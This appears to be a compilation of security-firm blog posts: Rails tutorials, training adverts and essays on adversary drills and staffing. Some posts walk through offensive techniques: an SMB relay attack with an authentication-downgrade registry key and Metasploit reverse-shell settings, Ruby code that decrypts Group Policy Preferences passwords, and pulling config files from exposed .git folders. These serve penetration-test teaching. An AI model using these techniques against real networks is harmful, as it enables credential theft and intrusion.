We are hosting two trainings at the Attack Research headquarters over the next few months. The first training is our Operational Post Exploitation class, which will be January 29th-January 30th.

We have also added Offensive Techniques as an available training in February. We will be hosting that training February 26th-February 28th. More details can be found at our training website.

We are also looking at doing a round of training in the London area in May of this year. Right now we are trying to gauge interest in this location. If you are interested in taking either Offensive Techniques or Rapid Reverse Engineering in this area, please email training@attackresearch.com so that we can gauge interest.

Also, a small but important detail, please ensure within your Gemfile you change:

gem 'bcrypt-ruby', '~> 3.0.0'

to

gem 'bcrypt-ruby', '~> 3.0.0', :require => 'bcrypt'

Now, back to the series. We last left off where a login page was visible when browsing to your site, but it didn't really do anything. Time to rectify that.

Within the Sessions controller, a create method was defined, and in it we called the User model's method, "authenticate". We have yet to define this "authenticate" method, so let's do that now.

Located at /app/models/user.rb

Also, we are going to add an encrypt_password method and call it using the "before_save" Rails callback. Basically, we are going to instruct the User model to call encrypt_password when the "save" method is called. For example:
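A minimal sketch of what app/models/user.rb might look like at this point; the exact method bodies are illustrative and assume bcrypt is used for the hashing (per the Gemfile change mentioned earlier):

```ruby
# app/models/user.rb -- illustrative sketch, not the exact listing
class User < ActiveRecord::Base
  attr_accessor :password
  before_save :encrypt_password

  # Called from the Sessions controller's create action
  def self.authenticate(email, password)
    user = find_by_email(email)
    if user && user.password_hash == BCrypt::Engine.hash_secret(password, user.password_salt)
      user
    end
  end

  def encrypt_password
    if password.present?
      self.password_salt = BCrypt::Engine.generate_salt
      self.password_hash = BCrypt::Engine.hash_secret(password, password_salt)
    end
  end
end
```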

So when you see something like user = User.new and user.save, you know that the encrypt_password method will be called by Rails prior to saving the user data because of the "before_save" definition on line 4. Now we have to add a few more things:

These are basically Rails validation functions that get called when attempting to save the state of an object that represents a User. The exception is "attr_accessor", which is a standard Ruby call that creates both a getter and a setter for the attribute.
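As a sketch, the additions being described might look like the following (the exact validation choices are illustrative):

```ruby
# Additions to app/models/user.rb -- illustrative
attr_accessor :password
validates_confirmation_of :password
validates_presence_of :password, :on => :create
validates_presence_of :email
validates_uniqueness_of :email
```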

Okay, now let's see what it looks like.

Alright, so now we have a login page that does something, but we need to create users. For this application's purpose, we are going to allow users to sign up. Let's provide a link for this purpose on the login page and, even further, let's create a navigation bar at the top. We want this navigation bar visible on every page visited by the user. The easiest way to do that is to make it systemic and place it within the application.html.erb file under the layouts folder. Unless overridden, all views will inherit the properties specified in this file (the navigation bar, for example).

Located at /app/views/layouts/application.html.erb

Without explaining all of Twitter-Bootstrap, one important thing to note is the class names of the HTML tags (ex: <div class="nav">) are how we associate an HTML element with a Twitter-Bootstrap defined style.

The logic portion, the portion that belongs to Ruby and Rails, is lines 13-18. Effectively, we are asking whether the user (current_user) visiting the page is authenticated (exists); if they are (do exist), show a link to the logout path. Otherwise, render login and signup path links.
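A sketch of what that conditional might look like in the layout (the path helper names are illustrative and depend on your routes):

```erb
<% if current_user %>
  <%= link_to "Logout", logout_path %>
<% else %>
  <%= link_to "Login", login_path %>
  <%= link_to "Signup", signup_path %>
<% end %>
```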

You are probably wondering where link_to and current_user come from. Rails provides built-in methods and you'll notice, in the views, they are typically placed between <%= and %>. So, link_to is a built in method. However, current_user is defined by us within the application controller and is NOT a built-in method.

Located at /app/controllers/application_controller.rb

Notice on line 8 we define a method called current_user. This pulls a user_id value from the Rails session. In order to make the current_user method accessible outside of just this controller and extend it to the view, we have annotated it as a helper_method on line 4.
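A sketch of application_controller.rb consistent with that description (line positions approximate):

```ruby
# app/controllers/application_controller.rb -- illustrative sketch
class ApplicationController < ActionController::Base
  protect_from_forgery
  helper_method :current_user   # exposes current_user to the views

  private

  # Look up the logged-in user from the session, memoized per request
  def current_user
    @current_user ||= User.find(session[:user_id]) if session[:user_id]
  end
end
```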

The next thing we need to do now is actually make the signup page. First, let's modify the attributes that are mass assignable via attr_accessible in the user model file.

Next, review the users_controller.rb file and add the methods new & create. When new is called, instantiate a new blank User object (@user). Under the create method, we can modify a new user element leveraging the parameters submitted by the user (email, password, password_confirmation) to create the user.
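A sketch of those two actions in users_controller.rb (the redirect target and flash message are illustrative):

```ruby
# app/controllers/users_controller.rb -- illustrative sketch
class UsersController < ApplicationController
  def new
    @user = User.new
  end

  def create
    # params[:user] carries email, password, and password_confirmation
    @user = User.new(params[:user])
    if @user.save
      redirect_to root_url, :notice => "Signed up!"
    else
      render "new"
    end
  end
end
```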

Explanation of the Intended Flow -

User clicks "signup" and is sent to /signup (GET request).

User is routed to the "new" action within the "user" controller and then the HTML content is rendered from - /app/views/users/new.html.erb.

Upon filling in the form data presented via new.html.erb, the user clicks "submit" and this data is sent off, this time in a POST request, to /users.

The POST request to /users translates to the "create" action within the "user" controller.

Now, obviously we are missing something.....we need a signup page! Let's code that up under new.html.erb.

/app/views/users/new.html.erb

The internals of Rails and how we are able to treat @user as an enumerable object and create label tags and text field tags might be a little too complicated for this post. That being said, basically, the @user object (defined in the User controller under the new action - ex: @user = User.new) has properties associated with it such as email, password, and password confirmation. When Rails renders the view, it generates the parameter names based off the code in this file. In the end, the parameters will look something like user[email] and user[password_confirmation], for example. Here is what the actual request looks like in Burp...
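For reference, a form like this is typically built with form_for, along the lines of this sketch:

```erb
<%= form_for @user do |f| %>
  <%= f.label :email %>
  <%= f.text_field :email %>
  <%= f.label :password %>
  <%= f.password_field :password %>
  <%= f.label :password_confirmation %>
  <%= f.password_field :password_confirmation %>
  <%= f.submit "Sign Up" %>
<% end %>
```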

Signup form generated by the code within /app/views/users/new.html.erb

Raw request of signup form submission captured.

Okay, so, now we have registered a user. The last piece here is to have a home page to view after successful authentication and also code the logout link logic so that it actually does something.

In order to do this, let's make a quick change in the sessions controller. Under the create method, we change home_path to home_index_path, as well as create a destroy method which calls the Rails method "reset_session" and redirects the user back to the root_url. Also, remove the content within the index action under the home controller.
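A sketch of the resulting sessions controller (flash messages are illustrative):

```ruby
# app/controllers/sessions_controller.rb -- illustrative sketch
class SessionsController < ApplicationController
  def create
    user = User.authenticate(params[:email], params[:password])
    if user
      session[:user_id] = user.id
      redirect_to home_index_path, :notice => "Logged in!"
    else
      flash.now.alert = "Invalid email or password"
      render "new"
    end
  end

  def destroy
    reset_session              # wipe the session, logging the user out
    redirect_to root_url
  end
end
```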

People often try to draw analogies between computer security and the military or warfare. Let's put aside for a moment the fact that I don't know anything about the military and continue on with this analogy.

Ask yourself for a moment: "What does the average person in the military spend their time doing?" And the answer I believe is training, drilling and exercising. They don't spend the vast majority of their time in heated battle. In fact only small spurts of time, I'd imagine, are spent that way.

Does your defence team spend all its time engaged in cyber battle? If not do they spend most of their time training, exercising and practising for future incidents? If not why not?

In my experience most defensive teams are in meetings, playing with tools, creating presentations, maintaining systems or perhaps doing some ad hoc analysis. Occasionally they might be engaged in research.

It is my belief that, much like soldiers, these teams should spend a large majority of their time in training. And the best way to do this training is to have an outside entity play the adversary, much like the Air Force Aggressor Squadrons.

Traditional penetration testing does NOT use enemy tactics, techniques and procedures. Penetration testing in general these days is simply patch management verification. Penetration testing often focuses on known exploits and real attackers do not. Attackers either use 0days, complex configuration/design issues or malware.

What's nice about the computer security realm is that it is much easier to replicate adversary "equipment" than with aircraft. The best methods to acquire this equipment is to conduct incident response engagements and/or to have global sources that provide samples and intrusion information.

These samples can then be reverse engineered, their functionality recreated and used in ongoing drills to keep defensive teams sharp.

I have come to believe that defence teams should be constantly drilling against adversary teams. This is the best way they can get better, find institutional deficiencies, improve and validate procedures, etc. This sort of ongoing training is more expensive than penetration testing for sure, but far outstrips traditional penetration testing in benefits.

- - -

Example Drill:

Day 1:

The adversary team sneaks a person into the client facility and embeds a device that provides a command and control foothold out to the internet.

The C2 is designed to appear like a specific attacker's behaviour, such as a beacon using a non-SSL encryption cipher over port 443 with a specific user-agent.

Day 2:

The adversary team begins lateral attack using a custom tool similar to psexec along with a special LSASS injection tool.

The team then sets up persistence using a non-public (but used by real attackers) registry related method along with an RDP related backdoor.

Day 3:

Next the team indexes all documents and stores them in a semi-hidden location on the hard drive, in CD-sized chunks, using a non-English language version of WinRAR and a password captured from an incident response event. The team searches out, identifies, and compromises systems, users, and data of interest. Each drill may have a different target, such as PCI data, engineering-related intellectual property, or executive communications.

Day 4:

Finally the team exfiltrates this data and prepares the notification document.

Day 5:

The team notifies the client that the week's drill is complete, likely has a conference call or VTC and answers questions related to the exercise. The notification stage includes data that can be used in signatures and alerts such as PCAPS, indicators of compromise, etc. The team and client then discuss what if anything was detected and what could have been done to improve performance, procedures, etc. Plans to tune and improve defensive system configurations can be developed at this stage as well.

- - -

If your defensive staff is not doing something along these lines at LEAST once a quarter, if not once a month, then your soldiers are untrained and likely to get slaughtered when it's time for the real battle.

Lately we have had a number of posts about our training classes, and I said I would put something technical up on the blog. In one of our classes, we teach students how to think like real bad guys and think beyond exploits. We teach how to examine a situation, how to handle that situation, and then how to capitalize on that situation. Recently on an engagement, I had to figure out how to exploit a domain-based account that could log into all Windows 7 hosts on the network, but there were network ACLs in place that prohibited SMB communications between the hosts. So, I turned to SMB relay to help me out. This vulnerability has plagued Windows networks for years, and with MS08-068 and NTLMv2, MS started to make things difficult. MS08-068 won't allow you to replay the hash back to the initial sender and get a shell, but it doesn't stop you from being able to replay the hash to another host and get a shell - at least, it doesn't stop you as long as the host isn't speaking NTLMv2! By default, Vista and up use "Send NTLMv2 response only" for the LAN Manager authentication level. This becomes problematic in newer networks, as seen in this screen shot from my first attempt to do SMB relay between two Windows 7 hosts:

In this scenario, we have host 192.168.0.14, which I have compromised and have discovered that the domain account rgideon can probably authenticate into all Windows 7 hosts. We have applied unique Windows-based recon techniques that we teach in our class to determine this. We see that 192.168.0.13 is also a Windows 7 host, and we will look to authenticate into it, but we can't do it from the .14 host. There is a firewall between .13 and .14; so instead, we will attempt to do SMB Relay with host 192.168.0.15 as the bounce host.

So, what can we do in this scenario? We don't teach too much visual hacking in any of our classes, so everything must be done using shells, scripts, or something inconspicuous. In this situation, I did some research looking into the LAN Manager authentication protocol. I found a nice little registry key that doesn't exist by default in Vista and up, but if we put the registry key in place, then the LAN Manager authentication settings listen to the registry key. This happens on the fly; there are no reboots, logon/logoff's, etc. There is a caveat with this! You have to have administrator privileges on the first host! This scenario is about tactically exploiting networks and doing this the smart way.

Since we have a shell on our first host (192.168.0.14) and we have gotten it by migrating into processes, stealing tokens, etc., we can move a reg file with the following contents up to the first host.

This registry key is targeting the following path: HKLM\SYSTEM\CurrentControlSet\Control\Lsa. If we drop in a new DWORD value of 00000000, this will toggle the LAN Manager authentication level down to the absolute minimum, which will send LM and NTLM responses across the network. Now that we have the LAN Manager authentication value set as low as it will go, we can capitalize on this.
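A sketch of what such a reg file would contain; LmCompatibilityLevel is the documented value controlling the LAN Manager authentication level:

```
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000000
```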

Open a metasploit console (you will need admin privileges) on the host that will be set up as a bounce through host (192.168.0.15). With your msfconsole, use the exploit smb_relay and whatever payload you choose. I have chosen to use a reverse_https meterpreter. The screen shot below is an example of my settings:
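The settings in that screen shot are along these lines (a sketch using the scenario's addresses; option names per the smb_relay module):

```
msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > set SRVHOST 192.168.0.15
msf exploit(smb_relay) > set SMBHOST 192.168.0.13
msf exploit(smb_relay) > set payload windows/meterpreter/reverse_https
msf exploit(smb_relay) > set LHOST 192.168.0.15
msf exploit(smb_relay) > exploit
```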

Once all your settings are selected, exploit and get ready for the hard part. We need to get this account to attempt LAN Manager authentication to our bounce-through host. SMB relay in this setting is probably best used by getting the account you are targeting to visit your malicious host (192.168.0.15) through a UNC path (\\mybadhost\share). Getting a user to do this is not something we will go into in this post. We reserve that type of thing for teaching at the class, but we have used this tactic, coupled with a few others, to compromise almost a whole Windows domain.

For brevity's sake, we will just go ahead and simulate this activity by typing the following in the Run dialog box on the first victim host (192.168.0.14): \\192.168.0.15\share\image.jpg.

I am not really hosting anything as a share on my host. I just need the LAN Manager authentication process to attempt authentication to my host (192.168.0.15). This authentication attempt actually happens even by just typing \\192.168.0.15. With just the IP address entered, you will see authentication attempts to your host, but for large-scale attacks, or something along those lines, it is best to have a full UNC path. Once the rgideon account on host 192.168.0.14 starts authentication requests to our relay host 192.168.0.15, things will actually look as though they are being denied by the end host 192.168.0.13:

As you can see, we are receiving LAN Manager authentication requests from 192.168.0.14 and attempting to relay them to 192.168.0.13, but it looks as though they are being denied. This is a false negative. Type in sessions -l in your metasploit console, and you will see that you have a meterpreter session on 192.168.0.13.

This is a simple demonstration and exploit that we teach in some of our offensive-based classes. Our Offensive Techniques class is based on trying to show people real-world attacks coupled with unique approaches to compromising both Windows and Unix infrastructures. Offensive Techniques has various sections covering techniques we have seen used in APT attacks, and the class also includes custom techniques built and used by Attack Research. The goal of our training is to get students out of the mindset of traditional pen testing and show them how real offensive attacks happen. We are hoping these types of concepts spread to the whole industry. When this happens, we will be able to make an impact at the business level on how companies, governments, etc., make decisions based upon real security threats and a true security landscape. If you are interested in the training we released yesterday or have questions, please visit our site or email us at training@attackresearch.com.

People tend to focus on various areas as being important for computer security, such as memory corruption vulnerabilities, malware, anomaly detection, etc. However, the lurking and, in my opinion, most critical issue is staffing. The truth is, there is no pool of candidates out there to draw from at a certain level in computer security. As an example, we do a lot of consulting, especially in the area of incident response, for oil & gas, avionics, finance, etc. When we go on site, we find that we have to have the following skills:

1. Soft skills. (often most important) The ability to talk to customers, dress appropriately, give presentations or speak publicly, assess the customer staff, culture, and politics, and determine the real goals. I can't stress enough how important this is. It's not the 90s anymore; showing up with a blue mohawk, a spike in the forehead, and leather pants, not being a team player, cussing, and surfing porn on the customer's systems doesn't cut it, no matter how good you are technically. If you are that guy, then you get to stay in the lab, and I guarantee you will make far less money, even if you can write ASLR bypass exploits and kernel rootkits.

2. Documentation. This ties with the above for number 1. If you didn't document it, you didn't do it. I don't care how awesome an 0day you discovered, or what race condition in the kernel you found. If you can't clearly document it, the customer doesn't care and sees no value in what you did. The documentation has to be clean, clear, and laid out so that an executive can understand it and so that the other security firm the customer hires to validate your results doesn't make fun of you.

4.) Reverse Engineering. This means disassembling binaries in IDA; running binaries in a debugger such as OllyDbg, WinDBG, or IDA; memory forensics; and especially de-obfuscation. Can you unpack a binary? How about if the packer is multi-stage and does memory page checksumming? What if the packer carries its own virtual machine? Do you know what breakpoints to set, when to change the Z flag, or how to hot patch a binary in memory?

5.) Understanding programming. To be good at this stuff you need to know C, C++, .NET, VB, HTML, ASP, PHP, x86 assembly and another dozen languages, at least well enough to look up APIs, understand standard libraries, discover which imports are important.

6.) Operating systems. You should know the ins and outs, including file systems, memory management, the kernel, the library system, and key command line tools of at least half a dozen OSes, especially as they are used in enterprise environments: domains, NFS, NIS, Kerberos, LDAP. So not only Windows, Linux, and OS X, but also Solaris, AIX, and some embedded or mobile systems.

7.) Exploit development. Often on engagements you run across an exploit or even an 0day that you must reverse engineer, replicate safely, and test on the customer's particular environment. You have to be able to take it apart, analyse the shellcode, understand everything it's doing, and re-write your own version of it.

8.) Versatility with a wide variety of tools, many of which are not easy to access outside of the enterprise. At a minimum enough technical base knowledge to use whatever tool is put in front of you. Examples include wireshark, splunk, fireeye, netwitness, arcsight, tippingpoint, snort / sourcefire, bluecoat, websense, TMI, Encase.

All of the members of your team whether you are a consulting shop or an internal incident response team need to be able to do these things and overlap with each other. Some can be stronger in RE than network forensics but everyone has to be able to do all of it to some extent, especially 1 and 2.

The problem with this? These people don't exist; they are unicorns. Those who can do this are either already employed, well paid, and tackling more interesting problems than you can offer, or they are running/partners in their own company that you could (and should) outsource to. </shameless self promotion>. But even small boutiques that can do the above are rare, heavily booked, and charging close to high-powered lawyer hourly rates. (When people question rates, I point out that big-name IR shops are around $400/hr and even the BestBuy Geek Squad charges $120/hr to reload your OS.)

A lot of big contractors are trying to approach security like they did IT in the 90s and 00s. Bid low, win a huge contract, then put out job ads for anyone who knows how to use a computer. The problem is, while you can come up to speed for a help desk or to admin a Windows server relatively quickly, the above list of skills takes a decade-plus to master. So big contractors are failing, badly, and trying to buy up the small guys. But there is another problem there as well.

People who are able to do the above 1.) value freedom highly and don't want to work 9 to 5 in a cube farm, and 2.) don't want to live or work long periods of time onsite where you are. They don't want to live in Houston or in Cleveland or in Indianapolis or probably even in the DC area. They want to live in La Jolla and San Francisco and New York, and someone, somewhere is willing to pay them a lot to do it, and probably do it remotely most of the time, so you are going to lose there.

In response, many companies try to follow the old plan of recruiting at colleges. In a lot of cases these students come out knowing some Office and probably some Java, and that's about it. You might luck out and get a good RIT, Georgia Tech, or New Mexico Tech student who knows more, but most likely these have already been recruited to the government or somewhere else. And the learning curve is long enough that by the time they are really good, they have already moved on. This kind of work is PRIME for remote. Let people come in for a week every other month. If you require internal security people to be on site all the time in some crappy city, you will fail.

On the security company side you have the same problem, no one to hire. So many security companies, in order to grow (because the way you make money in services is via higher staffing levels) hire whatever they can find and field them. This continues the trend in mediocre security, companies getting owned, PCI, etc. Boutiques cannot grow to the size necessary to win the bigger contracts because there is no one to hire.

The solution many companies have been trying out is to focus on buying appliances and contracting pro services to set them up, hoping that automation can solve the problem. It cannot. Here is a perfect example. A customer has a box that detects malware in email attachments. It flagged a PDF as highly malicious. We decided to check it out, and at first glance it looked very bad. It had all the classic signs of an exploit, heap spray, etc. You couldn't tell the difference between it and another verified malicious PDF. However, upon further inspection we discovered that a popular AutoCAD-type program generated legitimate PDFs that looked this way. This is something that is not automatable. You must have an experienced and skilled analyst to do this. No amount of rack-mount, fancy-logo appliances will help you. And the bigger your enterprise, the more you need. Every enterprise block of 30-50k IPs needs a team of 5-10 people.

Which leads me to the next issue: how you perceive your staffing resources. Example: one company I saw claimed to have a staff of 12 analysts to deal with security detection and response. I thought, wow, pretty good! Let's break the team down:

A manager, full time in meetings, paperwork, etc.

An assistant to the manager, secretarial work, etc.

3 senior advisers, i.e. guys about to retire, smart guys who give great advice and hold institutional knowledge, but not analysts

5 people involved in tool testing, stand up and maintenance (all those boxes I mentioned before). Great guys, not analysts or really involved in analysis

1 Developer mostly focused on designing queries and interfaces for the tools.

1 Actual analyst.

While management believes they have 12 people and doesn't understand why things take so long, they actually have one person. This situation is very common in big companies. One good analyst for an enterprise is not NEARLY enough. And you can't be reliant on a specific person unless you want to set yourself up for a disaster (while at the same time you must cultivate and care for those star players).

That's my case for why staffing is the most important issue we face in computer security. What is the solution? Some would say training, but let's be honest: were you back home writing rootkits for work after taking Hoglund and Butler's class at Blackhat? Probably not. Have you found piles of valuable 0day after completing Halvar's most excellent course in Vegas? I doubt it. A 2-day to 1-week course isn't doing it. Going through the entire SANS curriculum isn't doing it, and CISSP sure as hell isn't doing it.

You have to spend around 6 hours a day, after work, highly focused on coding, reversing, etc., for a minimum of 2 years to be decent. That is how the adversary does it. That's how the big-name researchers and best staff do it, and unfortunately you only need a couple of attackers for every 10 defenders out there.

Worth a read if you haven't. Unfortunately, the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.

Unfortunately(?), I don't run into this too often. What I do see is the presence of the /.git/ folder, and sometimes the config or index files are there, but there is certainly no way to know what's in the object folders (where the good stuff lives) [or so I thought].

user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'site_wordpress');

I did a talk at the Oct 2012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.

I've run into this on a few tests where people are taking advantage of this extremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)

I ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. Now you can do it yourself:
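A minimal standalone sketch of that ruby (the AES-256 key is the one Microsoft published for GPP cpassword values; the function and variable names here are mine):

```ruby
require 'openssl'
require 'base64'

# AES-256 key Microsoft published for GPP "cpassword" values (MS-GPPREF)
GPP_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')

# Decrypt a cpassword string pulled from a GPP Groups.xml file
def decrypt_cpassword(cpassword)
  # GPP strips the trailing base64 '=' padding, so restore it first
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  cipher = OpenSSL::Cipher.new('AES-256-CBC')
  cipher.decrypt
  cipher.key = GPP_KEY
  cipher.iv  = "\x00" * 16                      # static all-zero IV
  plaintext  = cipher.update(Base64.decode64(padded)) + cipher.final
  # The decrypted password is stored as UTF-16LE
  plaintext.force_encoding('UTF-16LE').encode('UTF-8')
end
```

Feed it the cpassword attribute from the downloaded xml and out comes the plaintext local administrator password.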

I needed to make a map of the access points for a client. Since I can't show that map, I made another using the same technique.

First, take your handy-dandy Android device and install Wigle Wifi Wardriving. It uses the internal GPS and wifi to log access points, their security level, and their GPS position. It looks like this (yup, I stole these):

[List of access points]

It also makes a cute map on your phone.

Once you have the APs, you can export the "run" from the data section. Yes, yes, the stolen photo says "settings", but if you install it today it will say "data" there now.

With the KML export you can import that directly into Google Earth and make all sorts of neat maps by toggling the data.

[All Access Points]
[Open Access Points]
[WEP Encrypted Access Points]

That's it.

-CG

In the last post, Basics of Rails Part 1, we created and ran the Rails application "attackresearch". Next, we will change the Web Server to Unicorn as well as introduce the concept of Rake.

Something to note: Rails typically runs in three modes:

Test - Mode typically used for Unit Tests.

Development - Development environment, includes verbose errors and stack traces.

Production - Settings are as if you were running this application in a production environment.

The default mode when running Rails locally on your machine is development mode. Any command you enter will run in the context of development mode. This applies to Rake tasks and Rails commands alike, and also holds true for the Rails console, which can be your best friend.

Now obviously, if you've done something custom like `export RAILS_ENV=production`, this would be different. Additionally, explicitly specifying the mode in which something like the Rails console runs (example: rails console production) will change the default behavior, or mode rather.

What does all this mean? Well, really it means that you want to develop in development mode and run a production application in production mode. Pretty simple huh?

Time to configure for Unicorn versus the default Webrick web server. If you are asking yourself "why", the answer is fairly straightforward: Unicorn is meant for production, handles a large number of requests better, and, overall, is more configurable. For the purposes of this tutorial, we will use Unicorn for both development and production.

I want to demonstrate two ways of doing this. The first is by using a startup shell script. The other, for the purposes of an introduction to Rake tasks, will be to actually create a Rake task to start the application in lieu of a shell script.

Startup shell file:

Modify your Gemfile by uncommenting the line with the Unicorn gem. Also, while we are at it, let's uncomment the Bcrypt gem as well:
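After uncommenting, the relevant Gemfile lines look something like this (version constraints may differ in your generated Gemfile):

```ruby
# Gemfile (excerpt)
gem 'unicorn'
gem 'bcrypt-ruby', '~> 3.0.0'
```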

Run `bundle install`:

Make the startup script executable and fire it up:
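A sketch of the start.sh script being described; its one working line is broken down below:

```sh
#!/bin/sh
# start.sh -- launch Unicorn, forwarding any arguments (e.g. ./start.sh -p 4444)
rvmsudo bundle exec unicorn $*
```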

The line `rvmsudo bundle exec unicorn $*` means...

rvmsudo - Allows you to run sudo commands while maintaining your RVM environment.

bundle exec - Directs bundler to execute the program, which automatically 'require'(s) all the gems in your Gemfile.

unicorn - Unicorn service.

$* - Any arguments passed to the script will be executed as part of the command inside of the script. Example: ./start.sh -p 4444 translates to - `rvmsudo bundle exec unicorn -p 4444` and would start the server on port 4444.

Alternatively, we can just as easily package this up as a Rake task. A Rake task is a repeatable task that can be executed using the `rake` command. Nothing magical, it just harnesses Ruby goodness to convert your task definitions into an executable command. There is an excellent tutorial on Rake available via the Railscasts site.

For our purposes, let's create a Unicorn rake file. Do this under /lib/tasks and use the `.rake` extension. Presumably, you may wish to have multiple tasks available to the Unicorn namespace. For instance, if you'd like to both start and stop the Unicorn service, it would be beneficial to create a namespace titled "unicorn" with multiple tasks inside it. For the purposes of this tutorial, I will only cover building a start task, as you can easily expand upon this. Also, since we are running the Unicorn service in an interactive mode, you can hit ctrl+c to stop it. I would note that having a start and stop task is very beneficial if you are running Unicorn detached (non-interactive), where the service runs in the background.

Moving along, here is the task...

Lines 1 & 9 - Begin and end the unicorn namespace definition.

Line 3 - Describe the task (useful at the console).

Line 4 - Define the task; the first argument is the task name, and any additional definitions (comma separated) are arguments. In this example, we accept a port argument.

Line 5 - We code some logic that says port_command will equal either an empty string or "-p <port number>"; if a port number is not provided (nil), it will equal an empty string.

Line 6 - This is a shell command that appends the result of port_command to `rvmsudo bundle exec unicorn`.

Let's list our tasks and see if it is available. Success! Notice how the description and command format are auto-magically taken care of for you.

You can run this in one of two ways:

`rake unicorn:start[4444]` (starts the Unicorn service on port 4444) OR...

`rake unicorn:start` (starts it on the default port, 8080)
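A reconstruction of that rake task consistent with the line-by-line walkthrough (a sketch; the require/include at the top are only needed to run it outside of rake, and the comments map to the walkthrough's line numbers):

```ruby
require 'rake'      # not needed in an actual .rake file loaded by rake
include Rake::DSL   # likewise only needed standalone

namespace :unicorn do                                        # "line 1"
  desc "Start the Unicorn service (optional port argument)"  # "line 3"
  task :start, [:port] do |t, args|                          # "line 4"
    # "line 5": empty string when no port is given, "-p <port>" otherwise
    port_command = args[:port].nil? ? '' : "-p #{args[:port]}"
    sh "rvmsudo bundle exec unicorn #{port_command}"         # "line 6"
  end
end
```

Drop this in lib/tasks/unicorn.rake and `rake -T` will list it alongside the built-in tasks.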

To recap, we've shifted off of WEBrick and over to Unicorn, and we've introduced the concept of a Rake task. Stay tuned for more parts in this series...

~cktricky

It generates it based on the old PowerSploit code here. Also, note that the 64-bit business I mentioned here still applies: if you are on x64 you need to call the PowerShell in SysWOW64 to run 32-bit payloads.

I was reading an article recently about how some of the sterilization requirements in factory farms actually encourage more damaging infections which then led me to think about antibiotic resistant strains of diseases popping up due to overuse of antibiotics. This finally led me to think about similarities in computer security.

Since I started officially working in security around 1996, a number of us have suffered from a Cassandra complex: providing warnings and gloomy predictions, which have usually come true, and being generally ignored. Now, over a decade later, it's too late to do some of what we should have done back then. Everything is owned. We have to retrofit now instead of building security in from the ground up. It's MUCH more expensive and difficult today than if we had started then.

One of the predictions I was making back in the early 2000s was the following:

We should move away from standardized IT environments where everything is centralized and the same

We should stop trying so hard to stop the 80% of low sophistication attackers and focus on the 20% of attackers we really care about and who can really hurt us

Recently I have been doing a lot of incident response work, and every organization I have dealt with is suffering from bullet number one. Everything centrally authenticates, everyone is running the same OS image, usernames are conventionalized and standardized, networks are flat, and everything is hacked. I consistently see an attacker take over an entire network because once they had one machine, they had them all. Does a scientist need the same environment as a secretary? Should the sales department's Windows desktop be able to touch the production SQL database? Don't know, don't care, everyone gets the standard image. (And the spread of an attack is massively higher.)

That the industry has tried hard to solve the low-hanging 80% of attacks is obvious from looking at the "solutions" that are provided, such as IDS, AV, firewalls, failure logging, scan-exploit-report penetration tests, etc. These have done a decent job of stopping scans, worms and mass malware for the most part, and have failed miserably at stopping the remaining 20%. So why is this a problem? 80% is pretty good, right? Well, let's look at the differences between the two types of attackers:

80%

Goals

Might steal your SSN or CC

Might use your system as a bot in a DDOS

Might redirect you to advertisements

Might strip your WoW character

Might deface your website / embarrass you

Techniques

Mass scans

1day exploits (often available patch)

Exploiting poor web coding

SQL injection

Mass malware

20%

Goals

Will try to steal your intellectual property and use it for strategic advantage

Will gather intelligence against you to gain an edge in negotiations, legislation, bids, etc.

Will destroy the master boot record of all your desktops to financially damage your country

Will use you to attack your customers to achieve the above

Will steal your source code to find 0day, insert backdoors or sell it to competitors

Techniques

0day

Targeted spear phishing

Sophisticated post exploitation & persistence

Covert channels

Anti-analysis & evasion

Malicious insiders, supply chain, implanted hardware

Mass data exfiltration

Crypto key stealing

Trust relationship hijacking

So what we have effectively done is build an environment where all target hosts are uniformly the same, and ensure that the only "germs" who can get in are the ones we can't detect, can't stop and can't deal with. Superbugs. What's worse, the more we get compromised and hurt by the 20%, the more money and resources we throw at trying to solve the 80%, and the more we put our heads in the sand about the attackers that really want to hurt us and are good at doing it. We've pushed the motivated attackers away from the easy-to-deal-with techniques towards the ones we can't solve very well and that are very expensive.

There are a few possible solutions:

Build active response capabilities (offense). This is messy and will cause a lot of problems but no one ever won a war with high walls and defense only. (Maginot line?)

Start throwing money and resources at the 20% problem. PCI is not going to do it. Compliance pen tests are not going to do it. Researching virtualizing every process, location aware document formats, degradation of service for anomalous connections, better intelligence, data sharing and correlation, in short making it increasingly expensive for the sophisticated attacker is what we should be looking at.

We have to stop popping antibiotics and figure out how to cut out the flesh-eating bacteria.

V.

Today I wanted to talk a bit more about APTSim. We all know by now that the bad guys always get in, especially determined, well funded and well equipped attackers. We know roughly HOW they are getting in, which is usually via a targeted phish, SQL injection, malicious URL, etc. These are things that are hard to defend against because they depend on a human element or on trust partnerships between organizations.

What we don't think about is the fact that our Incident Response and detection teams don't get exercised sufficiently (or ever) which makes them much less effective than they could be. We also don't think about modeling and understanding what real attack traffic looks like so we can tune our defenses against it. REAL traffic, not Nessus scans or CoreImpact exploits.

How can we know that our people and systems are actually able to detect the types of attacks we really care about if we don't know what each attack looks like in every data source we have? Is there a Windows event log entry reflecting a change in service permissions? Can the timing pattern in the call-home beacon be seen in net flow? What does an exfil file hidden in the recycle bin via user SID look like, and is it visible?

If you know all the malicious inputs to the system ahead of time, then you can determine all the data sources you have that show indicators that something has happened, rather than waiting until an attack happens to attempt to track it all back and hope for the best.

